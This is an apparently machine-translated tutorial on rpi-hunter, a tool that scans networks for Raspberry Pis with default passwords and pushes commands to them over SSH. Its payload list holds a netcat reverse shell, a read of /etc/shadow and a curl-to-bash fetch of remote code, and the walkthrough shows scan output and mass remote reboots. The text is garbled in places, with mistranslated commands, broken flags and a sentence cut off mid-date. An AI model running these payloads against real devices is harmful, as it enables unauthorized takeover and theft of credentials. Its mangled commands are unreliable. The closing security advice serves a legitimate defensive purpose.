When setting up a Raspberry Pi, changing the default password can easily be overlooked. Like many IoT devices, the Raspberry Pi standard Raspbian operating system installs with a well-known default password, making the device vulnerable to remote access. With a tool called rpi-hunter, hackers can discover, access, and delete custom payloads on all weak Pi connected to the same network.
This tool is intended primarily for local area networks, but can also detect connected Pi models and attack directly from anywhere on the Internet. Far from a simple joke, a vulnerable Pi on your network can grant hackers unrestricted access to other devices on your internal network and even distribute payloads to other vulnerable devices.
Why Standard Credentials Are a Problem
Devices That Still Use Default passwords are a significant risk for connecting to a network. Because many IoT devices do not allow the device owner to change the password due to hard-coded credentials, they are a preferred target for hackers and automated botnets. Hackers took advantage of these shortcomings in October 201
This botnet was created by scanning large blocks for the Internet for open Telnet ports and attempting to log in to each detected device using default passwords, acquire vulnerable devices, and add them to the Botnet Army.
Apart from IoT devices, standard credentials are also a major problem for routers. Since most users connect the device and never change the password, anyone who uses the Wi-Fi password can quickly gain access to the settings and management portal of the router. From here it is easy to set up remote administration, load unauthorized firmware to spy on the owner, and make other unauthorized changes to the device, such as pointing the DNS server to a malicious server.
If you know the default password of a device This feature makes it easy to automate device login to perform an action. This is where rpi-hunter comes into play. This allows us to leverage our knowledge of the standard Raspberry Pi password for automatic connection to the Pi and its remote control.
Rpi-hunter for Good
If you have more than one raspberry Pi, rpi-hunter can pick up the work for updating. Once you've found the pis on the network, you can change each device individually or access all the pi's simultaneously as a group. While rpi-hunter is programmed by default to use the default Raspbian password, you can simply change the password to use it to set up your own raspberry pis.
If you have a home or work network with Raspberry Pis If you need to configure, you can connect to the network, enable SSH, and make any necessary changes to the entire group as a group with rpi-hunter. You can perform updates, change passwords, or preinstall software on the Pis. You may need them all to run later. The ability to connect all your pis to the network while issuing commands to all is much more convenient than doing it one after the other.
It does not take much imagination to guess how you can use the ability to discover and control large groups of raspberry pis with standard permissions. Apart from the common Raspbian models, many Raspberry pis are put into service as OctoPrint controllers or other applications with known default passwords. When one of these devices is connected directly to the Internet, rpi-hunter can find them over the Internet and issue commands.
The risk of forgetting to change the password for the owner of a Raspberry Pi is that a stranger allows it to be controlled remotely and you may gain a bridgehead to further infect your network. The average user who sets up and forgets a Raspberry Pi with standard credentials may not see any signs that his device is compromised, even if quietly following instructions, such as: What you need
To follow this guide, you need a Raspberry Pi model like the Zero W or 3 Model B +, the Raspbian or Run Debian. You should be able to download this operating system for the Raspberry Pi from the Pi Foundation download page. Once your Raspberry Pi is equipped with Raspbian, you can connect it to your home network via an Ethernet cable (if the Pi has an Ethernet port) or Wi-Fi.
Next, you'll need a computer with Python running rpi-hunter on. Because Python is cross-platform, you should be able to install it from its download page on the operating system that you are using.
If Python is installed and your computer is connected to the same network that your Raspberry Pi is connected to, then you can start using rpi-hunter.
First, you need to install all libraries that rpi-hunter relies on. Open a new terminal window and enter the following commands:
sudo pip install -U argparse termcolor sudo apt -y install arp-scan tshark sshpass
If these libraries are installed, you can proceed with installing rpi-hunter from the GitHub repository. To clone the repo, you can enter the following in a terminal window:
git clone https://github.com/BusesCanFly/rpi-hunter.git cd rpi-hunter
Now we should be in the folder "rpi-hunter" (via the command cd ) with the newly downloaded "rpi-hunter.py", so that we can run. 19659025] Step 2: Enable SSH on your Raspberry Pi
Connect your Raspberry Pi to the network using either an Ethernet cable or Wi-Fi, and make sure that SSH is enabled. You can verify this by running the command raspi-config in a terminal window. Select "Interface Options," and then enable remote command-line access to your Pi with SSH.
Save your options as soon as SSH is enabled. You may need to reboot. If your device restarts, you can check to see if SSH is running by typing ifconfig to get your IP address in a terminal window of the Pi, and then run the following command on your other device.
sudo nmap -p 22 (here pi's IP address)
If the Nmap scan indicates that the port is "open," SSH will succeed on your Pi.
Before running for the first time, you need to make "rpi-hunter.py" executable by running the following command in a terminal window.
chmod + x rpi-hunter.py
Now we should be able to run the program and see the different flags we can work with.
sudo python rpi-hunter.py -h
Usage: rpi-hunter.py  optional arguments: -h, --help View and exit this help message --list Lists available payloads --no-scan disable ARP scan -r IP_RANGE IP range to scan -f IP_LIST IP list to use (defaults to ./scan/RPI_list) -c CREDS password to use when sshing --payload PAYLOAD (name or unformatted) payload [ex. reverse_shell or 'whoami'] -H HOST (using reverse_shell payload) host for reverse shell -P PORT (when using reverse_shell payload) Reverse shell port --safe Print the sshpass command, but do not execute it -q Do not print a banner or ARP scan output
Here are some useful flags. We can scan a single device with -r or a range of IP addresses, or even retrieve it from a list of IP addresses with the flag -f . There are a few other options for the payload to use, and we can examine the available payloads by entering the following command:
sudo python rpi-hunter.py --list
█████ ███ ███╗ ██╗ ██╗██╗ ██╗███╗ ██╗████████╗███████╗██ ██║ ██║██║ ██║████╗ ╔════╝██╔══██╗ ██║██╔██╗ ██║ ║ █████╗ ██║╚════╝██╔══██║██║ ██║██║╚██╗██║ ║ ██╔══╝ ██║██║ ██║ ██║╚██████╔╝██║ ██║ ██║ ██║ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -------------------------------------------------- --------------------------- BusseCanFly 76 32 2e 30 -------------------------------------------------- --------------------------- payloads: Specify with --payload name [raincow_install] sudo apt -y install fortune cowsay lolcat [motd] echo "CHANGE PASSWORD"> / etc / motd [raincow_bashrc] sudo echo "fortune | cowsay | lolcat" >> ~ / .bashrc [reverse_shell] rm / tmp / f; mkfifo / tmp / f; cat / tmp / f | / bin / sh -i 2> & 1 | nc None None> / tmp / fC [apt_update] sudo apt update && sudo apt -y upgrade [shadow] Sudokatze / etc / shadow [rickroll] curl -s -L http://bit.ly/10hA8iC | bash [gitpip] sudo apt -y install git python-pip
There are several options to choose from in the payload list. We can change the message of the day, create a reverse shell to remotely control the Pi, or even customize our own payload to send.
Step 5: Explore Raspberry Pis on the Network
How to Discover a Raspberry Pi on the Computer rpi-hunter performs a series of scans on the network to identify any device that is on Raspberry Pi itself. We can do a scan ourselves and enter the IP address directly, if we want to be exact, but this is about detecting and controlling devices on the network that you might not know about otherwise.
Without knowing anything In terms of the network we work in, rpi-hunter searches the entire network area for Raspberry Pi devices, adds them to a list, and then sends a payload to each device running standard credentials , We can do this with the whoami payload with the following command. I ran mine without first connecting the Pi to the network. (Note: You can also scan a specific IP range by inserting the flag -r and the range before the payload.)
sudo python rpi-hunter.py --payload whoami  ██ ██████╗ ██╗ ╗█ ╗█ ╗█ █████╗ ██║ ██║██║ ██║████╗ ╔════╝██╔══██╗ ██║██╔██╗ ██║ ║ █████╗ ██║╚════╝██╔══██║██║ ██║██║╚██╗██║ ║ ██╔══╝ ██║██║ ██║ ██║╚██████╔╝██║ ██║ ██║ ██║ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -------------------------------------------------- --------------------------- BusseCanFly 76 32 2e 30 -------------------------------------------------- --------------------------- Interface: wlp1s0, Data connection type: EN10MB (Ethernet) Launch Arp-scan 1.9.5 with 256 hosts (https://github.com/royhills/arp-scan) 172.16.42.1 DE: f3: 86: ec: ca: a0 (unknown) 60: 30: d4: 6a: 06: c8 (unknown) 172.16.42.27 b0: 19: c6: 98: 72: ee (unknown) 172.16.42.24 1c: 36: bb: 00: bd: 84 (unknown) 172.16.42.85 8c: 85: 90: 3a: 77: 14 (unknown) 172.16.42.15 30: 59: b7: 08: b2: 86 Microsoft 172.16.42.102 8c: 85: 90: c4: 45: 08 (unknown) 172.16.42.117 00: 26: bb: 1b: 97: 72 Apple, Inc. 172.16.42.121 8c: 85: 90: 0c: a6: e6 (unknown) 172.16.42.138 18: 65: 90: e0: 3e: 03 (unknown) 172,16.42.122 d0: c5: f3: 9a: eb: 2b (unknown) 172.16.42.35 10: 4a: 7d: 39: ea: e0 Intel Corporate 172.16.42.75 40: 4e: 36: 3b: 63: bf HTC Corporation 172.16.42.80 34: 23: 87: ae: e4: 41 Hon Hai Precision Ind. Co., Ltd. 172.16.42.95 3c: 2e: f9: bb: 87: ad (unknown) 172.16.42.105 88: e9: fe: 87: c7: 74 (unknown) 172.16.42.112 c4: b3: 01: bc: ab: e7 Apple, Inc. 172.16.42.115 36: 26: 1f: e8: 1f: 63 (unknown) 172.16.42.169 a8: bb: cf: 13: 42: 6e Apple Inc. 172.16.42.179 8c: 85: 90: 81: 9a: 9b (unknown) 172.16.42.141 8c: 85: 90: c3: be: 3e (unknown) 172.16.42.123 a4: 34: d9: 3f: b3: 30 Intel Corporate 172,16.42.164 b8: e8: 56: 12: 84: 36 Apple, Inc. Received 23 packets from the filter, discarded 0 packets from the kernel Arp-scan 1.9.5: 256 hosts were scanned within 2.571 seconds (99.57 hosts / sec). 23 answered Is 0 Raspi's 0 IP's loaded Send payload to Pi Godspeed, Little Payload
As you can see from the output, zero raspberry pis have been detected in the current network. If there was one, we should get a response from the Raspberry Pi, which says only "pi" in response to the whoami command.
Now let's go ahead and send one of the standard payloads included in the script for a live Raspberry Pi. We use the motd payload that the Pi's "Message of the Day" changes that pops up when a user logs in via SSH. (Note: If you have already found a Pi that you want to target, add the flag -r and its IP address before the payload.)
When you do this, the script stops Connect to each Pi using SSH with default credentials and then add it to the message text of the CHANGE YOUR PASSWORD day logon screen.
sudo python rpi-hunter.py - payload motd
████ ██████╗ ██╗ ██╗ ██╗██╗ ██╗███╗ ██╗ ████████╗███████╗█ █████╗ ██║ ██║██║ ██║████╗ ╔════╝██╔══██╗ ██║██╔██╗ ██║ ║ █████╗ ██║╚════╝██╔══██║██║ ██║██║╚██╗██║ ║ ██╔══╝ ██║██║ ██║ ██║╚██████╔╝██║ ██║ ██║ ██║ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -------------------------------------------------- --------------------------- BusseCanFly 76 32 2e 30 -------------------------------------------------- --------------------------- Interface: wlp1s0, Data connection type: EN10MB (Ethernet) Launch Arp-scan 1.9.5 with 256 hosts (https://github.com/royhills/arp-scan) 172.16.42.1 DE: f3: 86: ec: ca: a0 (unknown) 172.16.42.15 30: 59: b7: 08: b2: 86 Microsoft 172.16.42.24 1c: 36: bb: 00: bd: 84 (unknown) 172.16.42.48 b4: 9c: df: c1: 27: 5d (unknown) 172.16.42.85 8c: 85: 90: 3a: 77: 14 (unknown) 172.16.42.75 40: 4e: 36: 3b: 63: bf HTC Corporation 172.16.42.80 34: 23: 87: ae: e4: 41 Hon Hai Precision Ind. Co., Ltd. 172.16.42.169 a8: bb: cf: 13: 42: 6e Apple Inc. 172.16.42.121 8c: 85: 90: 0c: a6: e6 (unknown) 172,16.42.182 f4: 5c: 89: 99: 57: 13 Apple Inc. 172.16.42.102 8c: 85: 90: c4: 45: 08 (unknown) 172.16.42.97 a4: b8: 05: 66: a0: 64 Apple Inc. 172,16.42.122 d0: c5: f3: 9a: eb: 2b (unknown) 172.16.42.130 90: 61: ae: 8f: f4: 03 (unknown) 172.16.42.127 4c: 66: 41: 77: 66: 37 SAMSUNG ELECTRO-MECHANICS (THAILAND) 172.16.42.98 78: 4f: 43: 59: 7b: fb Raspberry Pi 172.16.42.112 c4: b3: 01: bc: ab: e7 Apple, Inc. Received 21 packets from the filter, discarded 0 packets from the kernel Arp-scan 1.9.5: 256 hosts were scanned within 2,538 seconds (100.87 hosts / second). 17 answered There is 1 Raspi's 1 IP's loaded Send payload to Pi Godspeed, small payloads Send payload to 172.16.42.98
Success! The next time we sign in to our Raspberry Pi via SSH, the message "CHANGE YOUR PASSWORD" should be added.
Now we can payloads to send the standard payloads that are deployed in the script, and use a simple custom payload. To do this, we can put any commands we want to send to the Pi in quotation marks after the – Payload flag. To restart each pi we recognize, we can send the command sudo reboot as payload. The resulting command looks like this:
sudo python rpi-hunter.py --payload "sudo reboot"
Is 1 Raspi's 1 IP's loaded Send payload to Pi Godspeed, small payloads Send the payload to 172.16.42.98 Connection to 172.16.42.98 closed by remote host.
After issuing this command, every Raspberry Pi on the network should be restarted immediately. If some pis use a "raspberry" password other than the Raspbian password, you can change the password rpi-hunter tries with the -c flag.
Accessing Pis with a Non-Standard Command The default command can be executed by running the following command in a terminal window, with the password added by Pi instead of "toor".
sudo python rpi-hunter.py -c toor --payload "sudo reboot"
Now that you can change both the password you've sent and your payload, rpi-hunter is ready to run any pi or group of Pis remote control.
devices with standard credentials are easily accessible, and rpi-hunter is a powerful and useful proof-of-concept to show how easy it is to take over a large number of vulnerable devices at the same time. Be sure to change the default password for each device you connect to your network and never make devices with default credentials directly available to the Internet.
If you are worried that someone else is accessing your Raspberry Pi, disable SSH if you do so I do not need it and consider using a key file instead of a simple passphrase to get SSH access on your device to secure.
I hope you liked this guide when searching for and transferring payloads to Raspberry Pis over a network with rpi-hunter! If you have questions about this remote access tutorial on Raspberry Pis, enter a comment below and contact me at Twitter @KodyKinzie .